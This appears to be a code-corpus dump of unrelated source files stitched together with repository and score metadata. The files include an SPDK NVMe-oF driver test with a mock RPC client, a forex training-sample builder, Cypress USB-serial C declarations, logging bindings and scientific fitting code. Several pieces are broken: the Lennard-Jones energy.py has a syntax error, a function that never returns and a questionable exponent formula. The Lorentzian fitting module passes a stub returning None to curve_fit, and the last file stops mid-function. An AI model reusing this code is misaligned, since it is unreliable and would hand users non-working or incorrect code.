"read": True,
"write_zeroes": False,
"write": True,
"flush": True,
"nvme_io": True
},
"claimed": False,
"block_size": 512,
"product_name": "NVMe disk",
"aliases": ["Nvme0n1"]
}, {
"num_blocks": 8192,
"uuid": "70efd305-4e66-49bd-99ff-faeda5c3052d",
"aliases": [
"Nvme0n1p0"
],
"driver_specific": {
"lvol": {
"base_bdev": "Nvme0n1",
"lvol_store_uuid": "58b17014-d4a1-4f85-9761-093643ed18f1",
"thin_provision": False
}
},
"supported_io_types": {
"reset": True,
"nvme_admin": False,
"unmap": True,
"read": True,
"write_zeroes": True,
"write": True,
"flush": False,
"nvme_io": False
},
"claimed": False,
"block_size": 4096,
"product_name": "Split Disk",
"name": "Nvme0n1p0"
}, {
"num_blocks": 8192,
"uuid": "70efd305-4e66-49bd-99ff-faeda5c3052d",
"aliases": [
"Nvme0n1p1"
],
"driver_specific": {
"lvol": {
"base_bdev": "Nvme0n1",
"lvol_store_uuid": "58b17014-d4a1-4f85-9761-093643ed18f1",
"thin_provision": False
}
},
"supported_io_types": {
"reset": True,
"nvme_admin": False,
"unmap": True,
"read": True,
"write_zeroes": True,
"write": True,
"flush": False,
"nvme_io": False
},
"claimed": False,
"block_size": 4096,
"product_name": "Split Disk",
"name": "Nvme0n1p1"
}, {
"num_blocks": 8192,
"uuid": "70efd305-4e66-49bd-99ff-faeda5c3052d",
"aliases": [
"lvs_test/lvol0"
],
"driver_specific": {
"lvol": {
"base_bdev": "Malloc0",
"lvol_store_uuid": "58b17014-d4a1-4f85-9761-093643ed18f1",
"thin_provision": False
}
},
"supported_io_types": {
"reset": True,
"nvme_admin": False,
"unmap": True,
"read": True,
"write_zeroes": True,
"write": True,
"flush": False,
"nvme_io": False
},
"claimed": False,
"block_size": 4096,
"product_name": "Logical Volume",
"name": "58b17014-d4a1-4f85-9761-093643ed18f1_4294967297"
}, {
"num_blocks": 8192,
"uuid": "8dec1964-d533-41df-bea7-40520efdb416",
"aliases": [
"lvs_test/lvol1"
],
"driver_specific": {
"lvol": {
"base_bdev": "Malloc0",
"lvol_store_uuid": "58b17014-d4a1-4f85-9761-093643ed18f1",
"thin_provision": True
}
},
"supported_io_types": {
"reset": True,
"nvme_admin": False,
"unmap": True,
"read": True,
"write_zeroes": True,
"write": True,
"flush": False,
"nvme_io": False
},
"claimed": False,
"block_size": 4096,
"product_name": "Logical Volume",
"name": "58b17014-d4a1-4f85-9761-093643ed18f1_4294967298"
}]
NVMF_SUBSYSTEMS = [{
"listen_addresses": [],
"subtype": "Discovery",
"nqn": "nqn.2014-08.org.nvmexpress.discovery",
"hosts": [],
"allow_any_host": True
}, {
"listen_addresses": [],
"subtype": "NVMe",
"hosts": [{
"nqn": "nqn.2016-06.io.spdk:init"
}],
"namespaces": [{
"bdev_name": "Nvme0n1p0",
"nsid": 1,
"name": "Nvme0n1p0"
}],
"allow_any_host": False,
"serial_number": "SPDK00000000000001",
"nqn": "nqn.2016-06.io.spdk:cnode1"
}, {
"listen_addresses": [],
"subtype": "NVMe",
"hosts": [],
"namespaces": [{
"bdev_name": "Nvme1n1p0",
"nsid": 1,
"name": "Nvme1n1p0"
}],
"allow_any_host": True,
"serial_number": "SPDK00000000000002",
"nqn": "nqn.2016-06.io.spdk:cnode2"
}]
class JSONRPCException(Exception):
def __init__(self, message):
self.message = message
class JSONRPCClient(object):
def __init__(self, addr=None, port=None):
self.methods = {"bdev_get_bdevs": self.get_bdevs,
"construct_nvmf_subsystem":
self.construct_nvmf_subsystem,
"nvmf_delete_subsystem": self.delete_nvmf_subsystem,
"nvmf_create_subsystem": self.nvmf_subsystem_create,
"nvmf_subsystem_add_listener":
self.nvmf_subsystem_add_listener,
"nvmf_subsystem_add_ns":
self.nvmf_subsystem_add_ns,
"nvmf_get_subsystems": self.get_nvmf_subsystems}
self.bdevs = copy.deepcopy(BDEVS)
self.nvmf_subsystems = copy.deepcopy(NVMF_SUBSYSTEMS)
def __del__(self):
pass
def get_bdevs(self, params=None):
if params and 'name' in params:
for bdev in self.bdevs:
for alias in bdev['aliases']:
if params['name'] in alias:
return json.dumps({"result": [bdev]})
if bdev['name'] == params['name']:
return json.dumps({"result": [bdev]})
return json.dumps({"error": "Not found"})
return json.dumps({"result": self.bdevs})
def get_nvmf_subsystems(self, params=None):
return json.dumps({"result": self.nvmf_subsystems})
def construct_nvmf_subsystem(self, params=None):
nvmf_subsystem = {
"listen_addresses": [],
"subtype": "NVMe",
"hosts": [],
"namespaces": [{
"bdev_name": "Nvme1n1p0",
"nsid": 1,
"name": "Nvme1n1p0"
}],
"allow_any_host": True,
"serial_number": params['serial_number'],
"nqn": params['nqn']
}
self.nvmf_subsystems.append(nvmf_subsystem)
return json.dumps({"result": nvmf_subsystem})
def delete_nvmf_subsystem(self, params=None):
found_id = -1
i = 0
for nvmf_subsystem in self.nvmf_subsystems:
if nvmf_subsystem['nqn'] == params['nqn']:
found_id = i
i += 1
if found_id != -1:
del self.nvmf_subsystems[found_id]
return json.dumps({"result": {}})
def nvmf_subsystem_create(self, params=None):
nvmf_subsystem = {
"namespaces": [],
"nqn": params['nqn'],
"serial_number": "S0000000000000000001",
"allow_any_host": False,
"subtype": "NVMe",
"hosts": [],
"listen_addresses": []
}
self.nvmf_subsystems.append(nvmf_subsystem)
return json.dumps({"result": nvmf_subsystem})
def nvmf_subsystem_add_listener(self, params=None):
for nvmf_subsystem in self.nvmf_subsystems:
if nvmf_subsystem['nqn'] == params['nqn']:
nvmf_subsystem['listen_addresses'].append(
params['listen_address']
)
return json.dumps({"result": ""})
def nvmf_subsystem_add_ns(self, params=None):
for nvmf_subsystem in self.nvmf_subsystems:
if nvmf_subsystem['nqn'] == params['nqn']:
nvmf_subsystem['namespaces'].append(
params['namespace']
)
return json.dumps({"result": ""})
def call(self, method, params=None):
req = {}
req['jsonrpc'] = '2.0'
req['method'] = method
req['id'] = 1
if (params):
req['params'] = params
response = json.loads(self.methods[method](params))
if not response:
return {}
if 'error' in response:
msg = "\n".join(["Got JSON-RPC error response",
"request:",
json.dumps(req, indent=2),
"response:",
json.dumps(response['error'], indent=2)])
raise JSONRPCException(msg)
return response['result']
class Target(object):
def __init__(self, name="Nvme0n1p0"):
self.name = name
class SpdkNvmfDriverTestCase(test.TestCase):
def setUp(self):
super(SpdkNvmfDriverTestCase, self).setUp()
self.configuration = mock.Mock(conf.Configuration)
self.configuration.target_ip_address = '192.168.0.1'
self.configuration.target_port = '4420'
self.configuration.target_prefix = ""
self.configuration.nvmet_port_id = "1"
self.configuration.nvmet_ns_id = "fake_id"
self.configuration.nvmet_subsystem_name = "nqn.2014-08.io.spdk"
self.configuration.target_protocol = "nvmet_rdma"
self.configuration.spdk_rpc_ip = "127.0.0.1"
self.configuration.spdk_rpc_port = 8000
self.driver = spdknvmf_driver.SpdkNvmf(configuration=
self.configuration)
self.jsonrpcclient = JSONRPCClient()
def test__get_spdk_volume_name(self):
with mock.patch.object(self.driver, "_rpc_call",
self.jsonrpcclient.call):
bdevs = self.driver._rpc_call("bdev_get_bdevs")
bdev_name = bdevs[0]['name']
volume_name = self.driver._get_spdk_volume_name(bdev_name)
self.assertEqual(bdev_name, volume_name)
volume_name = self.driver._get_spdk_volume_name("fake")
self.assertIsNone(volume_name)
def test__get_nqn_with_volume_name(self):
with mock.patch.object(self.driver, "_rpc_call",
self.jsonrpcclient.call):
nqn = self.driver._get_nqn_with_volume_name("Nvme0n1p0")
nqn_tmp = self.driver._rpc_call("nvmf_get_subsystems")[1]['nqn']
self.assertEqual(nqn, nqn_tmp)
nqn = self.driver._get_nqn_with_volume_name("fake")
self.assertIsNone(nqn)
def test__get_first_free_node(self):
with mock.patch.object(self.driver, "_rpc_call",
self.jsonrpcclient.call):
free_node = self.driver._get_first_free_node()
self.assertEqual(3, free_node)
def test_create_nvmeof_target(self):
with mock.patch.object(self.driver, "_rpc_call",
self.jsonrpcclient.call):
subsystems_first = self.driver._rpc_call("nvmf_get_subsystems")
self.driver.create_nvmeof_target("Nvme0n1p1",
"nqn.2016-06.io.spdk",
"192.168.0.1",
4420, "rdma", -1, -1, "")
subsystems_last = self.driver._rpc_call("nvmf_get_subsystems")
self.assertEqual(len(subsystems_first) + 1, len(subsystems_last))
def test_delete_nvmeof_target(self):
with mock.patch.object(self.driver, "_rpc_call",
self.jsonrpcclient.call):
subsystems_first = self.driver._rpc_call("nvmf_get_subsystems")
target = Target()
self.driver.delete_nvmeof_target(target)
subsystems_last = self.driver._rpc_call("nvmf_get_subsystems")
self.assertEqual(len(subsystems_first) - 1, len(subsystems_last))
target.name = "fake"
self.driver.delete_nvmeof_target(target)
self.assertEqual(len(subsystems_first) - 1, len(subsystems_last))
| 1.523438 | 2 |
server/algos/euler/transformer.py | yizhang7210/Acre | 2 | 6958 | """ This is algos.euler.transformer module.
This module is responsible for transforming raw candle data into training
samples usable to the Euler algorithm.
"""
import datetime
import decimal
from algos.euler.models import training_samples as ts
from core.models import instruments
from datasource.models import candles
TWO_PLACES = decimal.Decimal('0.01')
def extract_features(day_candle):
""" Extract the features for the learning algorithm from a daily candle.
The Features are:
high_bid, low_bid, close_bid, open_ask, high_ask, low_ask,
and close_ask (all relative to open_bid) in pips.
Args:
day_candle: candles.Candle object representing a daily candle.
Returns:
features: List of Decimals. The features described above, all in two
decimal places.
"""
multiplier = day_candle.instrument.multiplier
features = [
day_candle.high_bid,
day_candle.low_bid,
day_candle.close_bid,
day_candle.open_ask,
day_candle.high_ask,
day_candle.low_ask,
day_candle.close_ask,
]
features = [multiplier * (x - day_candle.open_bid) for x in features]
features = [decimal.Decimal(x).quantize(TWO_PLACES) for x in features]
return features
def get_profitable_change(day_candle):
""" Get the potential daily profitable price change in pips.
If prices rise enough, we have: close_bid - open_ask (> 0), buy.
If prices fall enough, we have: close_ask - open_bid (< 0), sell.
if prices stay relatively still, we don't buy or sell. It's 0.
Args:
day_candle: candles.Candle object representing a daily candle.
Returns:
profitable_change: Decimal. The profitable rate change described
above, in two decimal places.
"""
multiplier = day_candle.instrument.multiplier
change = 0
if day_candle.close_bid > day_candle.open_ask:
change = multiplier * (day_candle.close_bid - day_candle.open_ask)
elif day_candle.close_ask < day_candle.open_bid:
change = multiplier * (day_candle.close_ask - day_candle.open_bid)
return decimal.Decimal(change).quantize(TWO_PLACES)
def build_sample_row(candle_previous, candle_next):
""" Build one training sample from two consecutive days of candles.
Args:
candle_previous: candles.Candle object. Candle of first day.
candle_next: candles.Candle object. Candle of second day.
Returns:
sample: TrainingSample object. One training sample for learning.
"""
return ts.create_one(
instrument=candle_next.instrument,
date=candle_next.start_time.date() + datetime.timedelta(1),
features=extract_features(candle_previous),
target=get_profitable_change(candle_next))
def get_start_time(instrument):
""" Get the start time for retrieving candles of the given instrument.
This is determined by the last training sample in the database.
Args:
instrument: Instrument object. The given instrument.
Returns:
start_time: Datetime object. The datetime from which to query
candles from to fill the rest of the training samples.
"""
last_sample = ts.get_last(instrument)
if last_sample is not None:
start_date = last_sample.date - datetime.timedelta(1)
return datetime.datetime.combine(start_date, datetime.time())
return datetime.datetime(2005, 1, 1)
def run():
""" Update the training samples in the database from the latest candles.
This should be run daily to ensure the training set is up-to-date.
Args:
None.
"""
all_new_samples = []
for instrument in instruments.get_all():
start_time = get_start_time(instrument)
new_candles = candles.get_candles(
instrument=instrument, start=start_time, order_by='start_time')
for i in range(len(new_candles) - 1):
all_new_samples.append(
build_sample_row(new_candles[i], new_candles[i + 1]))
ts.insert_many(all_new_samples)
| 3.171875 | 3 |
diagrams/outscale/__init__.py | analyticsftw/diagrams | 17,037 | 6959 | <reponame>analyticsftw/diagrams<filename>diagrams/outscale/__init__.py
from diagrams import Node
class _Outscale(Node):
_provider = "outscale"
_icon_dir = "resources/outscale"
fontcolor = "#ffffff"
| 1.375 | 1 |
misc/python/mango/application/main_driver/logstream.py | pymango/pymango | 3 | 6960 | __doc__ = \
"""
=======================================================================================
Main-driver :obj:`LogStream` variables (:mod:`mango.application.main_driver.logstream`)
=======================================================================================
.. currentmodule:: mango.application.main_driver.logstream
Logging objects/attributes for :obj:`mango.application.main_driver.MainDriverFilter` filters.
Classes
=======
.. autosummary::
:toctree: generated/
LogStream - Message logging for :obj:`mango.application.main_driver.MainDriverFilter` filters.
Attributes
==========
.. autodata:: log
.. autodata:: mstLog
.. autodata:: mstOut
.. autodata:: warnLog
.. autodata:: errLog
"""
import mango
import mango.mpi as mpi
import os
import os.path
import sys
if sys.platform.startswith('linux'):
import DLFCN as dl
_flags = sys.getdlopenflags()
sys.setdlopenflags(dl.RTLD_NOW|dl.RTLD_GLOBAL)
from . import _mango_main_driver as _mango_main_driver_so
sys.setdlopenflags(_flags)
else:
from . import _mango_main_driver as _mango_main_driver_so
from mango.core import LogStream
#: Messages sent to stdout, prefixed with :samp:`'P<RANK>'`, where :samp:`<RANK>` is MPI process world rank.
log = _mango_main_driver_so._log
#: Messages sent to stdout, prefixed with :samp:`'MST'`, and messages also saved to history-meta-data.
mstLog = _mango_main_driver_so._mstLog
#: Messages sent to stdout, prefixed with :samp:`'OUT'`.
mstOut = _mango_main_driver_so._mstOut
#: Messages sent to stderr, prefixed with :samp:`'WARNING'`.
warnLog = _mango_main_driver_so._warnLog
#: Messages sent to stderr, prefixed with :samp:`'ERROR'`.
errLog = _mango_main_driver_so._errLog
__all__ = [s for s in dir() if not s.startswith('_')]
| 1.867188 | 2 |
ucdev/cy7c65211/header.py | luftek/python-ucdev | 11 | 6961 | # -*- coding: utf-8-unix -*-
import platform
######################################################################
# Platform specific headers
######################################################################
if platform.system() == 'Linux':
src = """
typedef bool BOOL;
"""
######################################################################
# Common headers
######################################################################
src += """
#define CY_STRING_DESCRIPTOR_SIZE 256
#define CY_MAX_DEVICE_INTERFACE 5
#define CY_US_VERSION_MAJOR 1
#define CY_US_VERSION_MINOR 0
#define CY_US_VERSION_PATCH 0
#define CY_US_VERSION 1
#define CY_US_VERSION_BUILD 74
typedef unsigned int UINT32;
typedef unsigned char UINT8;
typedef unsigned short UINT16;
typedef char CHAR;
typedef unsigned char UCHAR;
typedef void* CY_HANDLE;
typedef void (*CY_EVENT_NOTIFICATION_CB_FN)(UINT16 eventsNotified);
typedef struct _CY_VID_PID {
UINT16 vid;
UINT16 pid;
} CY_VID_PID, *PCY_VID_PID;
typedef struct _CY_LIBRARY_VERSION {
UINT8 majorVersion;
UINT8 minorVersion;
UINT16 patch;
UINT8 buildNumber;
} CY_LIBRARY_VERSION, *PCY_LIBRARY_VERSION;
typedef struct _CY_FIRMWARE_VERSION {
UINT8 majorVersion;
UINT8 minorVersion;
UINT16 patchNumber;
UINT32 buildNumber;
} CY_FIRMWARE_VERSION, *PCY_FIRMWARE_VERSION;
typedef enum _CY_DEVICE_CLASS{
CY_CLASS_DISABLED = 0,
CY_CLASS_CDC = 0x02,
CY_CLASS_PHDC = 0x0F,
CY_CLASS_VENDOR = 0xFF
} CY_DEVICE_CLASS;
typedef enum _CY_DEVICE_TYPE {
CY_TYPE_DISABLED = 0,
CY_TYPE_UART,
CY_TYPE_SPI,
CY_TYPE_I2C,
CY_TYPE_JTAG,
CY_TYPE_MFG
} CY_DEVICE_TYPE;
typedef enum _CY_DEVICE_SERIAL_BLOCK
{
SerialBlock_SCB0 = 0,
SerialBlock_SCB1,
SerialBlock_MFG
} CY_DEVICE_SERIAL_BLOCK;
typedef struct _CY_DEVICE_INFO {
CY_VID_PID vidPid;
UCHAR numInterfaces;
UCHAR manufacturerName [256];
UCHAR productName [256];
UCHAR serialNum [256];
UCHAR deviceFriendlyName [256];
CY_DEVICE_TYPE deviceType [5];
CY_DEVICE_CLASS deviceClass [5];
CY_DEVICE_SERIAL_BLOCK deviceBlock;
} CY_DEVICE_INFO,*PCY_DEVICE_INFO;
typedef struct _CY_DATA_BUFFER {
UCHAR *buffer;
UINT32 length;
UINT32 transferCount;
} CY_DATA_BUFFER,*PCY_DATA_BUFFER;
typedef enum _CY_RETURN_STATUS{
CY_SUCCESS = 0,
CY_ERROR_ACCESS_DENIED,
CY_ERROR_DRIVER_INIT_FAILED,
CY_ERROR_DEVICE_INFO_FETCH_FAILED,
CY_ERROR_DRIVER_OPEN_FAILED,
CY_ERROR_INVALID_PARAMETER,
CY_ERROR_REQUEST_FAILED,
CY_ERROR_DOWNLOAD_FAILED,
CY_ERROR_FIRMWARE_INVALID_SIGNATURE,
CY_ERROR_INVALID_FIRMWARE,
CY_ERROR_DEVICE_NOT_FOUND,
CY_ERROR_IO_TIMEOUT,
CY_ERROR_PIPE_HALTED,
CY_ERROR_BUFFER_OVERFLOW,
CY_ERROR_INVALID_HANDLE,
CY_ERROR_ALLOCATION_FAILED,
CY_ERROR_I2C_DEVICE_BUSY,
CY_ERROR_I2C_NAK_ERROR,
CY_ERROR_I2C_ARBITRATION_ERROR,
CY_ERROR_I2C_BUS_ERROR,
CY_ERROR_I2C_BUS_BUSY,
CY_ERROR_I2C_STOP_BIT_SET,
CY_ERROR_STATUS_MONITOR_EXIST
} CY_RETURN_STATUS;
typedef struct _CY_I2C_CONFIG{
UINT32 frequency;
UINT8 slaveAddress;
BOOL isMaster;
BOOL isClockStretch;
} CY_I2C_CONFIG,*PCY_I2C_CONFIG;
typedef struct _CY_I2C_DATA_CONFIG
{
UCHAR slaveAddress;
BOOL isStopBit;
BOOL isNakBit;
} CY_I2C_DATA_CONFIG, *PCY_I2C_DATA_CONFIG;
typedef enum _CY_SPI_PROTOCOL {
CY_SPI_MOTOROLA = 0,
CY_SPI_TI,
CY_SPI_NS
} CY_SPI_PROTOCOL;
typedef struct _CY_SPI_CONFIG
{
UINT32 frequency;
UCHAR dataWidth;
CY_SPI_PROTOCOL protocol ;
BOOL isMsbFirst;
BOOL isMaster;
BOOL isContinuousMode;
BOOL isSelectPrecede;
BOOL isCpha;
BOOL isCpol;
}CY_SPI_CONFIG,*PCY_SPI_CONFIG;
typedef enum _CY_UART_BAUD_RATE
{
CY_UART_BAUD_300 = 300,
CY_UART_BAUD_600 = 600,
CY_UART_BAUD_1200 = 1200,
CY_UART_BAUD_2400 = 2400,
CY_UART_BAUD_4800 = 4800,
CY_UART_BAUD_9600 = 9600,
CY_UART_BAUD_14400 = 14400,
CY_UART_BAUD_19200 = 19200,
CY_UART_BAUD_38400 = 38400,
CY_UART_BAUD_56000 = 56000,
CY_UART_BAUD_57600 = 57600,
CY_UART_BAUD_115200 = 115200,
CY_UART_BAUD_230400 = 230400,
CY_UART_BAUD_460800 = 460800,
CY_UART_BAUD_921600 = 921600,
CY_UART_BAUD_1000000 = 1000000,
CY_UART_BAUD_3000000 = 3000000,
}CY_UART_BAUD_RATE;
typedef enum _CY_UART_PARITY_MODE {
CY_DATA_PARITY_DISABLE = 0,
CY_DATA_PARITY_ODD,
CY_DATA_PARITY_EVEN,
CY_DATA_PARITY_MARK,
CY_DATA_PARITY_SPACE
} CY_UART_PARITY_MODE;
typedef enum _CY_UART_STOP_BIT {
CY_UART_ONE_STOP_BIT = 1,
CY_UART_TWO_STOP_BIT
} CY_UART_STOP_BIT;
typedef enum _CY_FLOW_CONTROL_MODES {
CY_UART_FLOW_CONTROL_DISABLE = 0,
CY_UART_FLOW_CONTROL_DSR,
CY_UART_FLOW_CONTROL_RTS_CTS,
CY_UART_FLOW_CONTROL_ALL
} CY_FLOW_CONTROL_MODES;
typedef struct _CY_UART_CONFIG {
CY_UART_BAUD_RATE baudRate;
UINT8 dataWidth;
CY_UART_STOP_BIT stopBits;
CY_UART_PARITY_MODE parityMode;
BOOL isDropOnRxErrors;
} CY_UART_CONFIG,*PCY_UART_CONFIG;
typedef enum _CY_CALLBACK_EVENTS {
CY_UART_CTS_BIT = 0x01,
CY_UART_DSR_BIT = 0x02,
CY_UART_BREAK_BIT = 0x04,
CY_UART_RING_SIGNAL_BIT = 0x08,
CY_UART_FRAME_ERROR_BIT = 0x10,
CY_UART_PARITY_ERROR_BIT = 0x20,
CY_UART_DATA_OVERRUN_BIT = 0x40,
CY_UART_DCD_BIT = 0x100,
CY_SPI_TX_UNDERFLOW_BIT = 0x200,
CY_SPI_BUS_ERROR_BIT = 0x400,
CY_ERROR_EVENT_FAILED_BIT = 0x800
} CY_CALLBACK_EVENTS;
CY_RETURN_STATUS CyLibraryInit ();
CY_RETURN_STATUS CyLibraryExit ();
CY_RETURN_STATUS CyGetListofDevices (
UINT8* numDevices
);
CY_RETURN_STATUS CyGetDeviceInfo(
UINT8 deviceNumber,
CY_DEVICE_INFO *deviceInfo
);
CY_RETURN_STATUS CyGetDeviceInfoVidPid (
CY_VID_PID vidPid,
UINT8 *deviceIdList,
CY_DEVICE_INFO *deviceInfoList,
UINT8 *deviceCount,
UINT8 infoListLength
);
CY_RETURN_STATUS CyOpen (
UINT8 deviceNumber,
UINT8 interfaceNum,
CY_HANDLE *handle
);
CY_RETURN_STATUS CyClose (
CY_HANDLE handle
);
CY_RETURN_STATUS CyCyclePort (
CY_HANDLE handle
);
CY_RETURN_STATUS CySetGpioValue (
CY_HANDLE handle,
UINT8 gpioNumber,
UINT8 value
);
CY_RETURN_STATUS CyGetGpioValue (
CY_HANDLE handle,
UINT8 gpioNumber,
UINT8 *value
);
CY_RETURN_STATUS CySetEventNotification(
CY_HANDLE handle,
CY_EVENT_NOTIFICATION_CB_FN notificationCbFn
);
CY_RETURN_STATUS CyAbortEventNotification(
CY_HANDLE handle
);
CY_RETURN_STATUS CyGetLibraryVersion (
CY_HANDLE handle,
PCY_LIBRARY_VERSION version
);
CY_RETURN_STATUS CyGetFirmwareVersion (
CY_HANDLE handle,
PCY_FIRMWARE_VERSION firmwareVersion
);
CY_RETURN_STATUS CyResetDevice (
CY_HANDLE handle
);
CY_RETURN_STATUS CyProgUserFlash (
CY_HANDLE handle,
CY_DATA_BUFFER *progBuffer,
UINT32 flashAddress,
UINT32 timeout
);
CY_RETURN_STATUS CyReadUserFlash (
CY_HANDLE handle,
CY_DATA_BUFFER *readBuffer,
UINT32 flashAddress,
UINT32 timeout
);
CY_RETURN_STATUS CyGetSignature (
CY_HANDLE handle,
UCHAR *pSignature
);
CY_RETURN_STATUS CyGetUartConfig (
CY_HANDLE handle,
CY_UART_CONFIG *uartConfig
);
CY_RETURN_STATUS CySetUartConfig (
CY_HANDLE handle,
CY_UART_CONFIG *uartConfig
);
CY_RETURN_STATUS CyUartRead (
CY_HANDLE handle,
CY_DATA_BUFFER* readBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyUartWrite (
CY_HANDLE handle,
CY_DATA_BUFFER* writeBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyUartSetHwFlowControl(
CY_HANDLE handle,
CY_FLOW_CONTROL_MODES mode
);
CY_RETURN_STATUS CyUartGetHwFlowControl(
CY_HANDLE handle,
CY_FLOW_CONTROL_MODES *mode
);
CY_RETURN_STATUS CyUartSetRts(
CY_HANDLE handle
);
CY_RETURN_STATUS CyUartClearRts(
CY_HANDLE handle
);
CY_RETURN_STATUS CyUartSetDtr(
CY_HANDLE handle
);
CY_RETURN_STATUS CyUartClearDtr(
CY_HANDLE handle
);
CY_RETURN_STATUS CyUartSetBreak(
CY_HANDLE handle,
UINT16 timeout
);
CY_RETURN_STATUS CyGetI2cConfig (
CY_HANDLE handle,
CY_I2C_CONFIG *i2cConfig
);
CY_RETURN_STATUS CySetI2cConfig (
CY_HANDLE handle,
CY_I2C_CONFIG *i2cConfig
);
CY_RETURN_STATUS CyI2cRead (
CY_HANDLE handle,
CY_I2C_DATA_CONFIG *dataConfig,
CY_DATA_BUFFER *readBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyI2cWrite (
CY_HANDLE handle,
CY_I2C_DATA_CONFIG *dataConfig,
CY_DATA_BUFFER *writeBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyI2cReset(
CY_HANDLE handle,
BOOL resetMode
);
CY_RETURN_STATUS CyGetSpiConfig (
CY_HANDLE handle,
CY_SPI_CONFIG *spiConfig
);
CY_RETURN_STATUS CySetSpiConfig (
CY_HANDLE handle,
CY_SPI_CONFIG *spiConfig
);
CY_RETURN_STATUS CySpiReadWrite (
CY_HANDLE handle,
CY_DATA_BUFFER* readBuffer,
CY_DATA_BUFFER* writeBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyJtagEnable (
CY_HANDLE handle
);
CY_RETURN_STATUS CyJtagDisable (
CY_HANDLE handle
);
CY_RETURN_STATUS CyJtagWrite (
CY_HANDLE handle,
CY_DATA_BUFFER *writeBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyJtagRead (
CY_HANDLE handle,
CY_DATA_BUFFER *readBuffer,
UINT32 timeout
);
CY_RETURN_STATUS CyPhdcClrFeature (
CY_HANDLE handle
);
CY_RETURN_STATUS CyPhdcSetFeature (
CY_HANDLE handle
);
CY_RETURN_STATUS CyPhdcGetStatus (
CY_HANDLE handle,
UINT16 *dataStatus
);
"""
| 1.484375 | 1 |
deep_qa/layers/wrappers/output_mask.py | richarajpal/deep_qa | 459 | 6962 | <reponame>richarajpal/deep_qa
from overrides import overrides
from ..masked_layer import MaskedLayer
class OutputMask(MaskedLayer):
"""
This Layer is purely for debugging. You can wrap this on a layer's output to get the mask
output by that layer as a model output, for easier visualization of what the model is actually
doing.
Don't try to use this in an actual model.
"""
@overrides
def compute_mask(self, inputs, mask=None):
return None
@overrides
def call(self, inputs, mask=None): # pylint: disable=unused-argument
return mask
| 3.109375 | 3 |
ljmc/energy.py | karnesh/Monte-Carlo-LJ | 0 | 6963 | """
energy.py
function that computes the inter particle energy
It uses truncated 12-6 Lennard Jones potential
All the variables are in reduced units.
"""
def distance(atom1, atom2):
"""
Computes the square of inter particle distance
Minimum image convention is applied for distance calculation for periodic boundary conditions
"""
dx = atom1.x - atom2.x
dy = atom1.y - atom2.y
dz = atom1.z - atom2.z
if dx > halfLx
dx -= Lx
elif dx < -halfLx:
dx += Lx
if dy > halfLy:
dy -= Ly
elif dy < -halfLy:
dy += Ly
if dz > halfLz:
dz -= Lz
elif dz < -halfLz:
dz += Lz
return dx**2 + dy**2 + dz**2
def energy(atom1, atom2, rc):
'''
calculates the energy of the system
'''
## Arithmatic mixing rules - Lorentz Berthlot mixing
eps = (atom1.eps + atom2.eps)/2
sig = (atom1.sigma * atom2.sigma)**0.5
rcsq = rc**2
rsq = distance(atom1, atom2)
if rsq <= rcsq:
energy = 4.0*eps*( (sig/rsq)**6.0 - (sig/rsq)**3.0)
else:
energy = 0.0
def writeEnergy(step, energy):
'''
Writes the energy to a file.
'''
with open('energy.dat', 'a') as f:
f.write('{0} {1}\n'.format(step, energy))
| 3.4375 | 3 |
CEST/Evaluation/lorenzian.py | ludgerradke/bMRI | 0 | 6964 | import numpy as np
import math
from scipy.optimize import curve_fit
def calc_lorentzian(CestCurveS, x_calcentires, mask, config):
(rows, colums, z_slices, entires) = CestCurveS.shape
lorenzian = {key: np.zeros((rows, colums, z_slices), dtype=float) for key in config.lorenzian_keys}
for k in range(z_slices):
for i in range(rows):
for j in range(colums):
if mask[i, j, k] != 0:
params = calc_lorenzian_pixel(CestCurveS[i, j, k, :], x_calcentires, config.Lorenzian['MT_f'],
config.Lorenzian['NOE1_f'], config.Lorenzian['NOE2_f'],
config.Lorenzian['OH_f'], config.Lorenzian['NH_f'])
if params is None:
continue
dic = {
'OH_a': params[3],
'OH_w': params[4],
'NH_a': params[5],
'NH_w': params[6],
'NOE1_a': params[7],
'NOE1_w': params[8],
'NOE2_a': params[9],
'NOE2_w': params[10],
'MT_a': params[11],
'MT_w': params[12],
}
for key in config.lorenzian_keys:
lorenzian[key][i, j, k] = dic[key]
return lorenzian
def calc_lorenzian_pixel(values, x_calcentires, MT_f, NOE1_f, NOE2_f, OH_f, NH_f):
# wassr_offset, da die Z-Spektren vorher korrigiert wurden
fit = lorenz_like_matlab(wassr_offset=0, MT_f=MT_f, NOE1_f=NOE1_f, NOE2_f=NOE2_f, OH_f=OH_f, NH_f=NH_f)
try:
param, param_cov = curve_fit(fit, x_calcentires, values, bounds=([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10,
10]))
except RuntimeError:
param = None
return param
def lorenz_like_matlab(wassr_offset, MT_f: float = - 2.43, NOE1_f: float = - 1, NOE2_f: float = - 2.6,
OH_f: float = + 1.4, NH_f: float = + 3.2):
# X_f = frequenz of X
#ret = (a + ak) - (a * ((b ** 2) / 4) / (((b ** 2) / 4) + (x - wassr_offset) ** 2))
pass
def one_lorenz(x, amplitude, width, wassr_offset, frequenz):
return amplitude * ((width ** 2) / 4) / (((width ** 2) / 4) + (x - (wassr_offset + frequenz)) ** 2)
| 2.140625 | 2 |
components/network_models_LSTU.py | neuralchen/CooGAN | 12 | 6965 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
#############################################################
# File: network_models_LSTU.py
# Created Date: Tuesday February 25th 2020
# Author: <NAME>
# Email: <EMAIL>
# Last Modified: Tuesday, 25th February 2020 9:57:06 pm
# Modified By: <NAME>
# Copyright (c) 2020 Shanghai Jiao Tong University
#############################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from functools import partial
import tensorflow as tf
import tensorflow.contrib.slim as slim
import tflib as tl
conv = partial(slim.conv2d, activation_fn=None)
dconv = partial(slim.conv2d_transpose, activation_fn=None)
fc = partial(tl.flatten_fully_connected, activation_fn=None)
relu = tf.nn.relu
lrelu = tf.nn.leaky_relu
sigmoid = tf.nn.sigmoid
tanh = tf.nn.tanh
batch_norm = partial(slim.batch_norm, scale=True, updates_collections=None)
instance_norm = slim.instance_norm
MAX_DIM = 64 * 16
def Genc(x, dim=64, n_layers=5, multi_inputs=1, is_training=True):
bn = partial(batch_norm, is_training=is_training)
